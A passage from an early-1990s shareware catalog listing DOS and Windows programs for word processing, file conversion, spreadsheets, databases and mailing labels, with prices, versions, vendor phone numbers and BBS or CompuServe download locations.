SWP15A.ZIP in DTPFORUM + forum LIB 7 on CompuServe; SWP15A.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 72k + Description: + At the touch of a hot-key in Ventura, jump to the DOS prompt + and allows you to run any program (shell provides all but 11K + of pre-Ventura RAM), then return. Takes just 7K when not in + use. Swaps Ventura to expanded memory, extended memory or disk. + + Chapter 3, "Writing applications" 128 + + + + Product: Tag! [***] + Needs: Unknown. + Author: Trinity Software, 703-791-2576 + Registration: $59.00 + Version: 1.51 (05-02-91) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts, bonus utilities. + Look for: availability unknown on BBSs; TAG151.ZIP in DTPFORUM + forum LIB 7 on CompuServe; TAG151.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 125k + Description: + Menu-driven utility provides lightning-fast pre-tagging of + ASCII, Word and WordPerfect files for Ventura. Tags in one + window; paragraphs in another. Use mouse or hot-keys to apply + tags, or automate in 3 ways: replace one tag with another; + apply a tag to each paragraph with selected text; apply a cycle + of up to 10 tags through any part of a document. Ideal for long + docs with repetitive structures. + + + 3.5 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: CODE TO CODE + DTP & Typesetting code conversion program. See full + description on page 124. + + Product: ConvDW + Needs: IBM PC, DOS 2.0 or better. + Author: CrossCourt Systems, 517-332-4353 + Registration: $20.00 + Version: 1.2 (01-20-90) + User benefits: Latest version with printed manual plus other + shareware programs on disk. + Look for: CONVDW.ZIP on BBSs (call 517-353-5458 to download it at + no charge); CONVDW.ZIP in IBMAPP forum LIB 2 on CompuServe. + Download size: 20k + Description: + Converts IBM DisplayWrite 3, 4, or 5 files to ASCII. It is the + best available program of its type. Can drop soft returns or + convert to hard returns. Can expand tabs to spaces or retain + them, drop other unwanted spaces, and mark font attributes such + as underlining. IBM does not publish the file format for + DisplayWrite so this is one of only a handful of programs, + either shareware or commercial, that will read DW files. + + Product: Decoder! [***] + Tag and Code Stripper for Ventura Publisher. See full + description on page 125. + + Chapter 3, "Writing applications" 129 + + + + Product: PM2LINO [***] + Removes Ctrl-D characters from PostScript. See full + description on page 59. + + Product: PS-TEXT [***] + Extracts text from PostScript file to ASCII. See full + description on page 60. + + Product: Tag! [***] + Automatic Pre-Tagging for Ventura Pub. Files. See full + description on page 127. + + Product: TextCon + Needs: IBM PC, DOS 2.0 or better. + Author: CrossCourt Systems, 517-332-4353 + Registration: $25.00 + Version: 1.73 (05-23-91) + User benefits: Latest release with printed manual plus other + shareware programs on disk. + Look for: TEXTCON.ZIP on BBSs (call 517-353-5458 to download it + at no charge); TEXTCN.ZIP in IBMAPP forum LIB 2 on CompuServe. + Download size: 41k + Description: + Reformats ASCII files for import to a word processor. Among + its features: strips carriage returns or adds them, as needed; + removes extraneous spaces; allows changes in line and paragraph + spacing. Its carriage return stripping is superb, properly + handling almost any paragraph style. Saves tremendous amount + of editing normally needed when importing ASCII files. Accepts + non-standard ASCII (pre-5.0 WordStar, Macintosh, and Unix). IBM + DCA/RFT output option available separately. + + Product: TextOut/5 + Needs: IBM PC, DOS 2.0 or better. + Author: CrossCourt Systems, 517-332-4353 + Registration: $20.00 + Version: 2.02 (06-09-91) + User benefits: Latest release with printed manual plus other + shareware programs on disk. + Look for: TEXTOUT5.ZIP on BBSs (call 517-353-5458 to download it + at no charge); TXTOUT.ZIP in WPSGA forum LIB 6 on CompuServe. + Download size: 36k + Description: + Converts WordPerfect 5.0 and 5.1 files to ASCII, with + improvements over WordPerfect's ASCII-output capabilities. + Features include: translation of all text, including footnotes, + endnotes, tables, text and equation boxes, and comments; can + mark many formatting attributes, such as bold or italic, with + custom ASCII strings; better translation of WP's extended + character sets; optional page-format output; reformatting to + new line length; faster than Text Out; and allows wildcard + filenames. + + Chapter 3, "Writing applications" 130 + + + + 3.6 Dictionaries + + Product: PC-GLOSSARY + Glossary of microcomputer & networking terms. See full + description on page 289. + + + 3.7 Document boilerplates + + 3.7.1 Business specific + + See also: Business (page 172). + + Product: Business Plan Master (IBM) [***] + Professional business plan templates. See full description on + page 197. + + Product: Business Plan Master (Mac) [***] + Professional business plan templates. See full description on + page 198. + + + 3.8 Creativity & brainstorming + + Product: Babble! + Needs: IBM PC, DOS 2.0 or better. 400k RAM. + Author: Korenthal Associates, Inc., 212-242-1790 + Registration: $25.00 + Version: 2.0 (02-08-91) + User benefits: Typeset manual, nifty keyboard template, many more + writing samples to enhance their enjoyment of the product, free + technical support and notification of major upgrades. + Look for: BAB200.ZIP on BBSs (call 718-837-3236 to download it at + no charge); BAB200.ZIP in PCVENB forum LIB 3 on CompuServe; + BAB200.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 158k + Description: + Spur your creativity and cure writer's block with Babble!, an + automatic writing program. Analyzes samples of text for style + and content, and then generates a steady stream of nonsensical + prose. Mix Shakespeare with Harold Robbins (or import your own + writings); apply special effects like Stutter and Subliminal. + Text is controlled on-the-fly using the unique "text-mixing + studio" control panel, and changes appear instantly. + "Wonderfully funny but useful," says PC Magazine (5/14/91). + + Chapter 3, "Writing applications" 131 + + + + Product: Creativity Package [***] + Needs: IBM PC, DOS 2.0 or better. 400k RAM. + Author: R.K. West Consulting + Registration: $34.00 + Version: 3.1 (03-01-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: CREATE*.ZIP (multiple files) on BBSs; CRTV*.ZIP in + IBMAPP forum LIB 11 (multiple files) on CompuServe. + Download size: 1k + Description: + 3-disk set for writers, teachers, students, executives -- + anyone who must produce fresh ideas. Includes a complete book + on creativity enhancement, software for computer-aided + brainstorming, and a poetry writing program. + + Product: NEWBIZ [***] + Needs: IBM PC, DOS 3.2 or better. CGA monitor recommended. + Author: Centre for Commercial Innovation (CCI) + Registration: $24.95 + Version: 1.0 (03-08-92) + User benefits: Support, free updates. + Look for: availability unknown on BBSs; NEWBIZ.ZIP in IBMAPP + forum LIB 7 on CompuServe. + Download size: 143k + Description: + Nobody ever got rich working for somebody else! So why not take + charge of your life, set up a business of your own and become + prosperous? Here is an exciting and effective Brainstorming + Program that will assist you in dreaming up- and evaluating + ideas to start your own business on a shoestring, based on the + tangible and intangible assets THAT YOU ALREADY HAVE! You can + also use it as a standalone Personal Decision Support System. + + Product: Poetry Generator [***] + Needs: IBM PC, DOS 2.1 or better. 400k RAM. + Author: R.K. West Consulting + Registration: $29.00 + Version: 2.1 (06-01-91) + User benefits: Latest version, free mail support, CIS support, + 900-number phone support, upgrade notification. + Look for: POETRY*.ZIP on BBSs; POET*.ZIP in IBMNEW forum LIB 8 on + CompuServe. + Download size: 1k + Description: + Turn your computer into a poet! Using a 20,000-word vocabulary, + this program creates free-verse poems at the touch of a button. + Using the structure of actual poems as models, the program + randomly combines words and short phrases into verses 4 to 9 + lines long. The results as fascinating. Some of these poems + have actually been published in national magazines. This + program has been featured in the Los Angeles Times, Scientific + American, Writer's Digest. + + Chapter 3, "Writing applications" 132 + + + + 3.9 Software tools + + 3.9.1 For multiple programs + + Product: PUTMAIL [***] + Librarian Utility for PVCS. See full description on page 274. + + 3.9.2 For Word + + 3.9.2.1 Word for Windows + + Product: Dinger + Needs: IBM PC, Windows 3.0 or better. Word for Windows. + Author: Pinecliffe International, 303-642-0604 + Registration: $19.00 + Version: 2.0 (02-15-91) + User benefits: Latest version on disk; Font help; Discounts! + Look for: DNGR20.ZIP on BBSs; DNGR20.ZIP in MSAPP forum LIB 12 on + CompuServe. + Download size: 55k + Description: + Gives you lightning-fast access to the bullet, em-dash, section + mark, copyright, arrow, and other common symbols, dingbats, and + "Foreign" characters. Also lets you get at any character in any + font with a couple of mouse clicks. Looking for the + ZapfDingbat finger? The Times Roman "Yen" sign? How about a + "(c)" in Helvetica? You don't need to go diving for the + printer manual any more, or tape another yellow sticky-note on + the monitor. Dinger shows how easy it can be! + + Product: Enveloper + Needs: IBM PC, Windows 3.0 or better. Word for Windows. HP + LaserJet or DeskJet printer. + Author: Pinecliffe International, 303-642-0604 + Registration: $29.00 + Version: 3.2 (05-07-91) + User benefits: Printed manual, latest disks and tips, Cheat + Sheet, Discounts. + Look for: ENVR32.ZIP on BBSs; ENVR32.ZIP in MSAPP forum LIB 12 on + CompuServe. + Download size: 120k + Description: + The fastest, easiest envelopes you've ever printed... Write + your letter. Click on "File" then "Enveloper". Check and make + sure Enveloper grabbed the address correctly. Click OK. Your + envelope comes out the printer, formatted the way you want it, + with your logo or return address, and (on lasers) a complete + postal bar code. + + Lots of options: multiple return addresses; all sorts of fonts, + bold, italic, point sizes; LOGOS!; even a new print/merge + facility that works from existing merge docs. + + Chapter 3, "Writing applications" 133 + + + + Product: WOPR-WinWord Office POWER Pack + Needs: IBM PC, Windows 3.0 or better. Word for Windows. + Author: Pinecliffe International, 303-642-0604 + Registration: $49.00 + Version: 1.0 (07-07-91) + User benefits: Printed Enveloper manual, latest disk, tips, + support, Discounts! + Look for: availability unknown on BBSs; WOPR*.EXE in MSAPP forum + LIB 1 (multiple files) on CompuServe. + Download size: 410k + Description: + The largest, most powerful collection of WinWord macros ever + assembled. Includes Enveloper (prints envelopes on LaserJets, + DeskJets, compatibles), PostScript Enveloper, 2 X 4 (prints any + document duplex or 4-up), a new File New (helps you keep track + of your templates and actually use them), Treasure (hunt for + new, useful menu assignments and macros you can use every day), + Dinger, WOPRClock, Labelit, Fancy Keys, Killer, Word Counter, + and much more. + + 3.9.3 For other + + Product: Btr Help! + Btrieve File Utility. Repair, Edit, Browse. See full + description on page 275. + + Product: Changer/2 + Changes files without word a processor. See full description + on page 276. + + Product: Decoder! [***] + Tag and Code Stripper for Ventura Publisher. See full + description on page 125. + + Product: Filer! [***] + Visual File Management for Ventura Publisher. See full + description on page 125. + + Product: Index! [***] + Automatic Index Coding for Ventura Publisher. See full + description on page 126. + + Product: JEPRS (Jeepers!) + Bibliographic Database Management System. See full description + on page 156. + + Product: Over_LAZ + HP LaserJet overlays and letterheads. See full description on + page 57. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 59. + + Chapter 3, "Writing applications" 134 + + + + Product: PSEARCH + Fast tool to search for files with text words. See full + description on page 21. + + Product: RECALL + Needs: IBM PC, DOS 3.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Version: 2.5 (04-11-91) + User benefits: Latest version and updates with BBS support. Money + Back Gurantee. + Look for: RECALL25.ZIP on BBSs (call 714-352-2825 to download it + at no charge); RECALL.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 74k + Description: + Provides advanced file selection for Wordperfect and other word + processing program. Enhances WordPerfect file selection by + providing sorted file lists, especially list sorted by date. + This allows you to locate files you most recently worked on. + Has a WordPerfect and text file viewer. It also can drive any + other program provided a command parameter can be the selected + filename. Features include text search, pattern matching and + more. + + Product: Swap! [***] + Instant DOS Shell for Ventura Publisher Gem. See full + description on page 127. + + Product: Tag! [***] + Automatic Pre-Tagging for Ventura Pub. Files. See full + description on page 127. + + Product: WinEdit + Perfect ASCII editor for Windows 3.0. See full description on + page 120. + + + 3.10 Other + + Product: ClipMate for Windows + Captures Multiple Clipboard Text Items. See full description + on page 86. + + Chapter 4, "Spreadsheet applications" 135 + + + + + + Chapter 4 + Spreadsheet applications + + See also: Finances (page 215); Business (page 172). + + + 4.1 Spreadsheet programs + + Product: ALITE + Needs: IBM PC, DOS 2.11 or better. 256k RAM; CGA or Hercules + monitor. + Author: TRIUS, Inc., 508-794-9377 + Registration: $25.00 + Version: 1.10f (12-15-91) + User benefits: Printed manual, master disks, 90-day support, + newsletter, update discounts. + Look for: ALITE.ZIP on BBSs (call 617-354-2505 to download it at + no charge); ALITE.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 200k + Description: + Powerful Spreadsheet that will run even on a system with only + 256K RAM! 2048 rows by 128 columns. Line, X-Y, Bar, Pie and + Stacked Bar Graphs. Macro Command Language, Mathematical, + Statistical, Financial, Date and String Functions. WKS and WK1 + file compatible. Data Regression, Data Question and Data Bin + operations. File Import, Export and Merge, PIC file + generation, and File Linking. Split Windows, Block Protection, + Matrix Operations, and much more... + + Product: AS-EASY-AS + Needs: IBM PC, DOS 2.11 or better. 382k RAM; CGA or Hercules + monitor; dual floppy drives or a hard disk. + Author: TRIUS, Inc., 508-794-9377 + Registration: $75.00 + Version: 5.00c (01-13-92) + User benefits: Printed manual, master disks, newsletter, 90-day + support, upgrade discounts. + Look for: ASEASY.ZIP on BBSs (call 617-354-2505 to download it at + no charge); ASEASY.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 210k + Special instructions: Product distribution restricted to the + United States. + Description: + Powerful 8192 rows by 256 columns Spreadsheet. EMS and Virtual + Memory Support. Fully Mouseable. Print Preview Mode with + Headers, Footers, etc. Math, Statistical, Financial, Logical, + Date/Time, String and User Defined Functions. Text & Graphics + on same page. 12 Graph Types, (log scales, split graphs). 9- + pin, 24-pin and Laserjet Support. WKS and WK1 File Compatible. + Powerful Macro Language. Goalseeking, dBASE File Export/ + Import, File Merge & File Linking. Matrix Operations, much + more... + + Chapter 4, "Spreadsheet applications" 136 + + + + Product: InstaCalc + Needs: IBM PC, DOS 3.0 or better. Standalone mode: two floppy + drives. TSR mode: either hard disk or expanded or extended + memory. + Author: FormalSoft, 801-565-0971 + Registration: $49.00 + Version: 3.00 (06-01-91) + User benefits: Printed manual, master disks, technical support, + upgrade discounts. + Look for: INSTA3.ZIP on BBSs (call 801-532-2444 to download it at + no charge); INSTA3.ZIP in IBMAPP forum LIB 6 on CompuServe. + Download size: 320k + Description: + A high power standalone spreadsheet which can also be run as a + TSR (pop up) in less than 15K of RAM! As a TSR you can pop up + InstaCalc inside other programs and cut & paste data with those + programs. And InstaCalc provides the following features: 256 x + 4096 grid, direct import/export of 1-2-3 and dBase files, + graphics, powerful macros, 100 @functions, file linking, goal + seeking, auditing, database commands, EMS and mouse support, + file manager, online help, macro recorder, and much more! + + + 4.2 Boilerplates/templates + + Product: Business Plan Master (Mac) [***] + Professional business plan templates. See full description on + page 198. + + + 4.3 Software tools + + 4.3.1 For multiple programs + + Product: 4Print + Paper saving utility for LaserJets & DeskJets. See full + description on page 52. + + 4.3.2 For Lotus + + Product: Total Investor for 1-2-3 + Portfolio Manager/Technical Analysis Template. See full + description on page 217. + + Product: Total Investor for Symphony + Portfolio Manager/Technical Analysis Template. See full + description on page 217. + + Chapter 5, "Database applications" 137 + + + + + + Chapter 5 + Database applications + + See also: Data (page 158). + + + 5.1 Relational database managers + + Product: HouseHold TRACKER + Needs: IBM PC, DOS 3.3 or better. + Author: Fischer Grafix & Software + Registration: $20.00 + Version: 1.3a (02-10-92) + User benefits: Master disks, phone support. + Look for: FMSHT.ZIP on BBSs; FMSHT.ZIP in IBMAPP forum LIB 7 on + CompuServe. + Download size: 183k + Special instructions: Product distribution restricted to the + United States. + Description: + This program keeps track of many of the items around the house + in one database. Items like household goods (model #'s, serial + #'s, cost, warranties, etc.), auto repairs, VCR tapes, magazine + subscriptions, phone list, utilities and credit cards. The + program will print your list for insurance purposes or make a + label for your VCR tape. Easy to use menus. + + Product: Movie Guide + Catalog Movies with full multimedia support. See full + description on page 329. + + Product: PC-HAM + HAM logging, contest and SS game simulation. See full + description on page 338. + + Product: SR-Info + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: Sub Rosa Publishing Inc., 416-398-8414 + Registration: $100.00 + Version: 3.30 (09-01-91) + User benefits: Bound manual over 500 typeset pages; free tech + support by mail/fax/CIS; half hour free phone support; discount + on 'Info Discozine' (magazine-on-a-disk). + Look for: SRI30*.ZIP (multiple files) on BBSs. + Download size: 700k + Description: + Most powerful full-featured relational database language in + shareware world. Complete procedural language with compiler, + plus "conversational" mode. Language VP-Info compatible; + handles dBASE/Clipper data files without conversion. Now + supports dBASE memo fields. Maximum 6 data files with multiple + active indexes at same time; 65,000 records. Full suite of + + Chapter 5, "Database applications" 138 + + + + commented sample programs to use as models for your own + projects. Outperforms most $795 products; it's easier to learn + and faster to program. + + Product: STAFF-BASE + Needs: IBM PC, DOS 3.0 or better. 640k RAM. Hard disk + recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $69.00 + Version: 3.0 (01-01-91) + User benefits: Printed manual, latest version of software, + selfrunning DEMO-TUTOR developed with Dan Bricklins Demo II, + phone support. + Look for: availability unknown on BBSs; STAFF3.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 300k + Special instructions: Product distribution restricted to the + United States. + Description: + DBMS productivity tool designed for minimizing keystrokes. + Innovative features: data viewing and input via powerful data- + table, copy range of cells, replicate content of cell, search + and replace, change character case (upper,lower,proper) in cell + or globally. Complex relational structures by means of the + dBLOOKUP feature. Simple filtering, complex query and sorting, + data import/export, statistics for filtered data, data base + housekeeping, report/label generator, macros, access to + external files... + + Product: STAFF-DBMS-PRODUCT-FAMILY + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard Disk. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $250.00 + Version: XX (06-01-91) + User benefits: See each STAFF module: INTEGRATOR, BASE, GRAF, + REPORT, UTIL, KICK, DIAL, MASK. + Look for: availability unknown on BBSs. + Download size: 2000k + Special instructions: Product distribution restricted to the + United States. + Description: + Product family designed to give the user specialized tools for + managing day to day operations with large amounts of data. A + consistent user interface is common to all modules. You can + custom design your DBMS tool by integrating only the needed + modules. STAFF-BASE is the database engine. Check the other + STAFF modules for Graphics, Relational Reports, Miscellaneous + Utilities, TSR Database Engine, Dialing from DBF file, Mask + generation and use, RunTime Module for developers of database + applications.. + + Product: STAFF-DEVELOPER + Free RunTime Licence for Database Engines. See full + description on page 397. + + Chapter 5, "Database applications" 139 + + + + Product: STAFF-KICK + Needs: IBM PC, DOS 3.0 or better. 640k RAM. Extended or expanded + memory and hard disk recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version on disk, and phone + support. + Look for: availability unknown on BBSs; STFKIC.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 340k + Special instructions: Product distribution restricted to the + United States. + Description: + The TSR version of STAFF-BASE. It is recommendable to be used + in parallel with spreadsheets, word processors, or large + applications. Extended or expanded memory is identified + automatically and swapping from and to any application is + instantaneous. When no extended or expanded memory is available + the swapping is taking place between the hard disk and the + memory, resulting in a slower implementation. Dialing can be + performed when the cursor is placed on a valid phone number.... + + Product: STAFF-MASK + Needs: IBM PC, DOS 3.0 or better. 640k RAM, Hard disk. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $49.00 + Version: 1.2 (06-01-91) + User benefits: Printed manual, latest version on disk, phone + support. + Look for: availability unknown on BBSs; STFMAS.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 200k + Special instructions: Product distribution restricted to the + United States. + Description: + Allows you to create without traditional programming effort + masks for data entry, viewing, and editing. The data entry + cells can be set up for data validation purposes. Data entry + can be performed using the classic double entry mode and + automatic checking, giving the possibility of correction. + Filtering and powerfull queries allow efficient data retreival + for viewing and editing purposes. The dBLOOKUP allows an + efficient data entry and viewing system by showing other DBFs + as data tables. + + Product: STAFF-REPORT + Relational Report Generator for DBF files. See full + description on page 156. + + Chapter 5, "Database applications" 140 + + + + Product: WAMPUM + Needs: IBM PC, DOS 2.1 or better. Hard disk or two 720K floppy + drives. 512k RAM. + Author: Ward Mundy Software, 404-237-9420 + Registration: $50.00 + Version: 4.2 (12-31-90) + User benefits: Next update free plus 90 days free support by + phone/mail/BBS. Soft-bound manual set is $20. Unlimited-user + network licenses are $150. + Look for: WAMPUM42.ZIP on BBSs (call 404-879-5985 to download it + at no charge); WAMPUM.ZIP in IBMAPP forum LIB 3 on CompuServe; + WAMPUM42.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 360k + Description: + One of the data base granddaddy's of the shareware revolution, + WAMPUM provides the richest assortment of DBMS functions for + the lowest cost of any data base product in the world. WAMPUM + now can be loaded as a 20K TSR and supports PCX graphic fields. + + Provides fully relational, menu-driven DBMS support with + standard dBASE III data bases. Virtually all dBASE features are + supported including dBASE-compat. reports and labels. Includes + PowerBrowse, form letter support, and a phone dialer. + + Product: Zephyr + Needs: IBM PC, DOS 2.1 or better. Hard disk, 640k RAM. + Author: Ward Mundy Software, 404-237-9420 + Registration: $50.00 + Version: 2.0 (12-31-90) + User benefits: Soft-bound manual, next upgrade free, plus 90 days + free support by phone/mail/BBS. Unlimited-user network license + is $250. + Look for: ZEPHYR20.ZIP on BBSs (call 404-879-5985 to download it + at no charge); ZEPHYR.ZIP in IBMAPP forum LIB 3 on CompuServe; + ZEPHYR20.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 720k + Description: + A fully relational, FoxPro-compatible DBMS for non-programmers. + It now can be loaded as a 20K TSR pop-up. 25 data bases can be + manipulated simultaneously. Its performance is roughly 16 times + that of dBASE III. + + Using a Mac-like interface, sophisticated applications can be + designed in minutes, not months. Reports, labels, list, and + form letters are a breeze to create. Has an integrated + windowing environment and includes a calendar, puzzle, and a + calculator. Supports a mouse! + + + 5.2 Flat-file database managers + + See also: Database applications, Mailing label systems + (page 142). + + Chapter 5, "Database applications" 141 + + + + Product: dLITE + Needs: IBM PC, DOS 2.1 or better. 160k RAM, or under 100K with + 64K of available EMS memory. + Author: Ward Mundy Software, 404-237-9420 + Registration: $25.00 + Version: 2.0 (07-01-91) + User benefits: Soft-bound, printed manual plus next upgrade free + and 90 days free technical support by phone/mail/BBS. + Look for: DLITE20.ZIP on BBSs (call 404-879-5985 to download it + at no charge); DLITE.ZIP in IBMAPP forum LIB 3 on CompuServe; + DLITE20.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 240k + Description: + A programmable dBASE III-compatible desktop file manager with + several major enhancements. It is designed to be loaded as a + TSR which can be "popped up" from within any text-based DOS + application. + + While working with your favorite word processor or spreadsheet, + up to 10 different applications can be popped up and data can + be "pasted" into the foreground application. Using LOTUS-style + menus, sophisticated applications can be designed. A sample + mail list is included on the disk. + + Product: FASTFILE + Needs: IBM PC, DOS 2.0 or better. + Author: Interactive Mini Systems, Inc., 509-783-3829 + Registration: $70.00 + Version: 5.33 (07-09-91) + User benefits: Printed manual, master disks, phone/newsletter + support, utilities. Shareware disks of other programs. + Look for: FAST-F.EXE (multiple files) on BBSs; FAST-F.EXE in + IBMAPP forum LIB 0 (multiple files) on CompuServe. + Download size: 60k + Description: + An extremely fast (FULL featured) database. Files are always + compressed. Great for laptop's and single disk computers. Many + features reduce data entry effort. Comes with Billing, + CheckBook/GL, Invoice, Client List (mail labels), Inventory, + Teacher's Gradebook, & FASTquiz (makes matching & multiple + choice tests & scrambles answers). Or create your own file + design. Hundreds recds/file and several files/disk. It's easy + to learn because same screen is used to enter, edit, find + records. + + Product: Information Please + Free-Form Database, Text Database. See full description on + page 147. + + Product: Layout + Office layout and equipment inventory. See full description on + page 195. + + Chapter 5, "Database applications" 142 + + + + Product: Music Manager for Windows [***] + Music collection database. See full description on page 321. + + Product: NAMEBASE [***] + Name/Address/Notes database w/mouse support. See full + description on page 201. + + Product: On This Day + "What Happened On This Day in History?" See full description + on page 298. + + Product: PopDBF + 4K TSR for "Instant Access to X-Base Files" See full + description on page 150. + + Product: SR-Info + High-performance relational database language. See full + description on page 137. + + Product: STAFF-DBMS-PRODUCT-FAMILY + DBMS-Productivity Product Family. See full description on + page 138. + + Product: STAFF-DEVELOPER + Free RunTime Licence for Database Engines. See full + description on page 397. + + Product: STAFF-DIAL + Dialing with phone numbers stored in DBF file. See full + description on page 84. + + Product: STAFF-KICK + TSR DBMS compatible with dBASE III Plus. See full description + on page 138. + + Product: VIDEOCAT + Catalogs videocassette collections. See full description on + page 331. + + Product: WAMPUM + Menu-Driven dBASE-Compat. DBMS in a 20K TSR. See full + description on page 139. + + Product: Zephyr + FoxPro-Compatible DBMS for Non-Programmers. See full + description on page 140. + + + 5.3 Mailing label systems + + See also: Database applications, Flat-file database managers + (page 140); Utilities, Printer utilities, Envelope addressers + (page 60). + + Chapter 5, "Database applications" 143 + + + + Product: The Address Book Solution + Needs: IBM PC, DOS 2.0 or better. + Author: GSF Software & Solutions, 716-283-3804 + Registration: $20.00 + Version: 2.1 (05-31-91) + User benefits: Printed manual & disk; telephone support. + Look for: availability unknown on BBSs. + Download size: 180k + Description: + TSR Mailing/Address list program. Unlimited capacity. Sorts + data in user-defined order. Allows the selection of records + using a dBASE compatible filter. User-defined field names. + Carry forward from Add/Edit. Copies data into PC application. + Import/Export/Mail-Merge. Quick search and approximate search + methods. Output to printer or file. Store data on HD/diskette. + Programmable keys for use within TABS & other applications. 30 + user-defined categories. Displays previously added record. + + Product: CompUser + A Rated Cyclopedia Of The Shareware Arena. See full + description on page 396. + + Product: dbDIAL(tm) + 7k TSR Database/Dialer. See full description on page 85. + + Product: FASTMAIL + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Hard Disk + Recommended. + Author: CACHE MICROSYSTEMS, 805-549-0532 + Registration: $17.00 + Version: 2.27 (06-01-91) + User benefits: 1 yr. Tech Support. + Look for: FSTML227.ZIP on BBSs (call 414-789-4210 to download it + at no charge). + Download size: 200k + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to use menu driven mailing list program. Many features + include: add, edit, delete, display, two pass duplicate name + search, print names, print mailing labels on six different + formats, supports laser printer printers, statistics, names + printed in 10 differeent orders. Full screen editing and + database backup for multiple list support. Export data for mail + Merge, SDF or DBASE formats. Browse/subject searching on all or + specific fields. Full International Support + + Product: FlexBase + Create database, reports, letters, labels. See full + description on page 200. + + Product: GRAB Plus(r) + Envelope Addressor & Database. See full description on + page 60. + + Chapter 5, "Database applications" 144 + + + + Product: Maillist / M-Label [***] + Needs: IBM PC, DOS 2.0 or better. 512k RAM; hard disk strongly + recommended. + Author: R.K. West Consulting + Registration: $39.00 + Version: 5.25/3.2 (01-29-92) + User benefits: Latest version, printed manual, free mail support, + CIS support, 900-number phone support, upgrade notices. + Look for: MAIL*.ZIP (multiple files) on BBSs; MAIL*.ZIP in IBMAPP + forum LIB 9 (multiple files) on CompuServe. + Download size: 1k + Description: + Easy-to-use mailing list manager for business or personal use, + manages up to 99 separate lists. Prints labels, has automatic + duplicate checking, search by any field, "sound alike" search, + pop-up notepad for each record, optional password protection, + compare and combine lists, restore deleted records, extra + fields for user coding, label customization and more. + + Product: MULTIFILE-XL + Needs: IBM PC, DOS 2.1 or better. + Author: H&P Software, 719-561-0810 + Registration: $29.95 + Version: 1.7 (08-22-91) + User benefits: Latest version with printed manual. + Look for: MULT-XL (multiple files) on BBSs. + Download size: 140k + Description: + A database for mailing labels, inventories, and maintenance + records. Each record has 6 fields at 50 characters per field. + Up to 4 search names can by typed to find records. Prints + special labels in color using EPSON JX-80 compatible printers. + No.of records limited by disk space. Sorted printouts limited + to 10,000 record files. Can be used as an external cust.& parts + or goods database with FAST INVOICE WRITER,(Disk #_____).Prints + 1-across labels only. Does date flagging, and numeric search- + total. + + Product: My Little Realm [***] + Checking, charging, mailing label system. See full description + on page 225. + + Product: NAMEBASE [***] + Name/Address/Notes database w/mouse support. See full + description on page 201. + + Product: Names & Dates + Address Book, Calendar, Mailing Label combo. See full + description on page 88. + + Product: PARTY TRACKER + Political Organization Membership System. See full description + on page 202. + + Chapter 5, "Database applications" 145 + + + + Product: PC-Names + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: WR Software, 415-930-0369 + Registration: $18.00 + Version: 1.32 (02-05-91) + User benefits: Latest version, phone support, printed + documentation, and vinyl address book cover. + Look for: PCNM132.ZIP on BBSs (call 415-937-0156 to download it + at no charge). + Download size: 240k + Description: + Holds unlimited names with generous address and notes areas. + Prints mailing labels (1-3 across), pocket-size (and any larger + size) address books, Rolodex cards (2 sizes), envelopes + (optional return address), 5 more reports. Telephone autodial, + sort by name or Zip code, Mail Merge, export, import, + categories for grouping names, duplicate search, custom label + sizes, support for laser and dot matrix printers. + + Product: Plain Vanilla Labels + Needs: IBM PC, DOS 2.0 or better. Printer. + Author: Rosewood Software, 416-284-6119 + Registration: $10.00 + Version: 3.13 (12-14-91) + User benefits: A code will be sent which will remove exhortations + to register. + Look for: PVLAB313.ZIP on BBSs; PV313.ZIP in IBMAPP forum LIB 10 + on CompuServe. + Download size: 98k + Description: + Plain Vanilla Labels is an easy-to-use label program which uses + standard 3 1/2 by 15/16 inch tractor feed labels. Labels can be + stored in up to 10 files, or a label can be printed without + saving the data. Each label file can have its own set of macros + to make data entry easier. Data can be indexed at any point in + each label. Remarks can be "hidden" in any part of the label so + that they can be seen by the user but not printed on the label. + The program has a sophisticated search function. + + Product: PostCardMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 3.51 (10-01-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: PCM351.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PCM351.ZIP in IBMAPP forum LIB 9 on CompuServe. + Download size: 188k + Description: + Designed to help Users compose post cards and maintain + addresses. The Address feature has entries for name, + salutation, code, three line address and a line for ZipCode, + telephone number, and a remarks line. Print outs include + + Chapter 5, "Database applications" 146 + + + + listings of the addresses, address labels, 3X5 cards, 4X6 post + cards or Roladex cards AND response cards that pre print a + response from the addressee to mail to the originator. Post + cards cost 1/3 less than a letter and in some cases are equally + as good ie meeting notices. + + Product: Public Address [***] + Needs: IBM PC, DOS 2.1 or better. 384k RAM. Hard disk + recommended. + Author: Paradise Programming, 206-352-9863 + Registration: $35.00 + Version: 2.1 (03-10-92) + User benefits: Printed manual, master disks, phone/mail support, + one free update. + Look for: PUB_ADD.EXE on BBSs (call 206-943-1513 to download it + at no charge); 